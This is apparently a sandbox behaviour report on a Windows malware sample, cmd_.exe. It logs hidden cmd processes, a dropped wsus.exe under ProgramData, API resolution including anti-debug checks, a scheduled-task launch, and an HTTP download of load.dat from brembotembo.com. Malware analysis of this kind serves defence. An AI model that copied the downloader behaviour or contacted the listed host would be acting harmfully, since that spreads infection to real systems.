Process (7)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd | show_window = SW_HIDE |
|
4 | |
| Create | C:\ProgramData\Settings\wsus.exe | os_pid = 0xa40, creation_flags = CREATE_DETACHED_PROCESS, CREATE_NORMAL_PRIORITY_CLASS, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | show_window = SW_HIDE |
|
2 |
Module (689)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | gsbcconf.dll | base_address = 0x0 |
|
1 | |
| Load | odbcconf.dll | base_address = 0x74e60000 |
|
1 | |
| Load | Kernel32.dll | base_address = 0x75440000 |
|
1 | |
| Load | User32.dll | base_address = 0x75d10000 |
|
2 | |
| Load | kernel32 | base_address = 0x75440000 |
|
1 | |
| Load | shell32.dll | base_address = 0x76140000 |
|
9 | |
| Load | wininet.dll | base_address = 0x75190000 |
|
251 | |
| Load | ntdll | base_address = 0x775d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75440000 |
|
253 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x75d10000 |
|
1 | |
| Get Handle | c:\windows\syswow64\gdi32.dll | base_address = 0x75e10000 |
|
1 | |
| Get Handle | c:\windows\syswow64\advapi32.dll | base_address = 0x77130000 |
|
1 | |
| Get Handle | c:\windows\syswow64\shell32.dll | base_address = 0x76140000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x75f40000 |
|
1 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x75c30000 |
|
1 | |
| Get Handle | c:\windows\syswow64\shlwapi.dll | base_address = 0x753e0000 |
|
1 | |
| Get Handle | c:\users\qj4suk~1\appdata\local\temp\cmd_.exe | base_address = 0x400000 |
|
1 | |
| Get Filename | gsbcconf.dll | process_name = c:\users\qj4suk~1\appdata\local\temp\cmd_.exe, file_name_orig = C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe, size = 260 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapCreate, address_out = 0x75454a2d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x775fe026 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x754514c9 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x7545110c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x754511f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75457a10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x754511c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x754511a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetErrorMode, address_out = 0x75451b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadProcessMemory, address_out = 0x7546cfcc |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x754510ff |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileSize, address_out = 0x7545196e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x754551b3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75451282 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x75453ed3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75451410 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetHandleInformation, address_out = 0x7547cb69 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7546eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x75455929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyA, address_out = 0x75472a9d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x75473102 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatA, address_out = 0x75472b7a |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x75455a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x75451700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x754511e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x754514fb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateMutexA, address_out = 0x75454c6b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryA, address_out = 0x754549d7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7545492b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x754514b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetShortPathNameA, address_out = 0x7547594d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x754534b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessA, address_out = 0x75451072 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x754533a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringA, address_out = 0x7547b2b7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateDirectoryA, address_out = 0x7547d526 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RemoveDirectoryA, address_out = 0x754d44bf |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileA, address_out = 0x754553c6 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileA, address_out = 0x75455444 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75451725 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersionExW, address_out = 0x75451ae5 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentActCtx, address_out = 0x7546d551 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x754517b9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleOutputCP, address_out = 0x75469b0f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateToolhelp32Snapshot, address_out = 0x7547735f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32FirstW, address_out = 0x75478baf |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32NextW, address_out = 0x7547896c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75453f5c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75477aca |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x754d454f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x7546c807 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75451328 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x754f7bff |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAlloc, address_out = 0x7545588e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedDecrement, address_out = 0x754513f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75451222 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x75451245 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodeSystemPointer, address_out = 0x7760ad98 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x7545469b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x75451946 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77611f6e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75455189 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7547d1a1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x7545179c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x75454493 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x7545495d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x7547d1d4 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75453587 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x75452d3c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77610fcb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77609d35 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RaiseException, address_out = 0x754558a6 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x7547d1c3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineA, address_out = 0x754551a1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75454950 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75455235 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75454a6f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7545192e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77603002 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedIncrement, address_out = 0x75451400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75451450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75454a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x775f22b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x775f2270 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x754514e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75453531 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75451916 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x776045f5 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x75454d40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75453509 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x754551e3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x754551cb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x7545170d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x7547772f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x754587c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75451809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7546d802 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x754549ad |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x75d341f6 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfW, address_out = 0x75d4e061 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MoveWindow, address_out = 0x75d33698 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharUpperBuffA, address_out = 0x75d2fe47 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharUpperBuffW, address_out = 0x75d2fc5d |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetMenu, address_out = 0x75d32bb9 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadStringA, address_out = 0x75d2db21 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x75d3ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetTextMetricsW, address_out = 0x75e282b2 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetTextFaceW, address_out = 0x75e29936 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameW, address_out = 0x7714157a |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHGetSpecialFolderPathA, address_out = 0x7638fb26 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteA, address_out = 0x76387078 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = DragFinish, address_out = 0x76354e4a |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstance, address_out = 0x75f89d0b |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeSecurity, address_out = 0x75f67259 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x75f809ad |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitialize, address_out = 0x75f5b636 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateGuid, address_out = 0x75f815d5 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoUninitialize, address_out = 0x75f886d3 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 9, address_out = 0x75c33eae |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 8, address_out = 0x75c33ed5 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 6, address_out = 0x75c33e59 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 2, address_out = 0x75c34642 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrStrA, address_out = 0x7540c45b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75454f2b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7545359f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75451252 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75454208 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75454d28 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x754d4195 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7545d31f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7546ee7e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7761441c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7763c381 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7546f088 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776205d7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7763ca24 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x775f0b8c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77641e1d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x754d4761 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x754ccd11 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x754d424f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x754d46b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x754e6676 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x754d4751 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x754e65f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x754d47c1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x754d47e1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x754d47f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceFrequency, address_out = 0x754541f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsBadCodePtr, address_out = 0x75472b34 |
|
1 |
System (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 3000 milliseconds (3.000 seconds) |
|
2 | |
| Get Time | type = System Time, time = 1627-02-02 21:37:10 (UTC) |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Mutex (9)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | desired_access = SYNCHRONIZE |
|
9 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = ComSpec, result_out = C:\Windows\system32\cmd.exe |
|
2 |
Debug (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| c:\users\qj4suk~1\appdata\local\temp\cmd_.exe | type = DEBUG_STRING, text = C:\ProgramData\Settings\wsus_41a480.tmp |
|
1 |
Network Behavior
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 178 bytes |
| Total Data Received | 250.00 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | brembotembo.com |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | brembotembo.com |
| Server Port | 80 |
| Data Sent | 178 |
| Data Received | 256000 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = http, server_name = brembotembo.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /load.dat, flags = INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://brembotembo.com/load.dat |
|
1 | |
| Read Response | size = 1024, size_out = 1024 |
|
250 |
Process #7: taskeng.exe
0
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\system32\taskeng.exe |
| Command Line | taskeng.exe {7366205D-AB28-4705-9A68-ED75B1319F38} S-1-5-21-1335525288-214869617-2635229968-1000:EXB9WSP\qj4SUKboE:Interactive:Highest[1] |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:10, Reason: Created Scheduled Job |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:28 |
| Remarks | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4b0 |
| Parent PID | 0x334 (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
388
0x
994
0x
6C4
0x
4C4
0x
4BC
0x
4B4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x0033ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0048ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x0058ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00717fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x008a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x01caffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001cb0000 | 0x01cb0000 | 0x020a2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002130000 | 0x02130000 | 0x021affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000021b0000 | 0x021b0000 | 0x022affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022f0000 | 0x022f0000 | 0x0236ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x02480000 | 0x0274efff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002750000 | 0x02750000 | 0x0282efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002840000 | 0x02840000 | 0x028bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002920000 | 0x02920000 | 0x0299ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000029e0000 | 0x029e0000 | 0x02a5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b10000 | 0x02b10000 | 0x02b8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| user32.dll | 0x771d0000 | 0x772c9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x772d0000 | 0x773eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| taskeng.exe | 0xfffb0000 | 0x100023fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| tschannel.dll | 0x7fefa630000 | 0x7fefa638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ktmw32.dll | 0x7fefaa20000 | 0x7fefaa29fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| xmllite.dll | 0x7fefb730000 | 0x7fefb764fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwmapi.dll | 0x7fefb770000 | 0x7fefb787fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x7fefbb50000 | 0x7fefbba5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x7fefc930000 | 0x7fefc976fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x7fefcc30000 | 0x7fefcc46fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wevtapi.dll | 0x7fefce60000 | 0x7fefceccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x7fefd200000 | 0x7fefd224fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x7fefd230000 | 0x7fefd23efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrtremote.dll | 0x7fefd320000 | 0x7fefd333fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefd430000 | 0x7fefd49afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x7fefd710000 | 0x7fefd912fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7fefd970000 | 0x7fefd98efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefdd90000 | 0x7fefdd9dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x7fefdda0000 | 0x7fefde76fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefde80000 | 0x7fefdf1efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefdf20000 | 0x7fefe028fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefe030000 | 0x7fefe05dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe060000 | 0x7fefe0c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7fefe0d0000 | 0x7fefe1fcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7fefe2a0000 | 0x7fefe37afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefe4c0000 | 0x7fefe588fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x7fefe590000 | 0x7fefe628fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7fefe8f0000 | 0x7fefe960fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff710000 | 0x7feff710fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
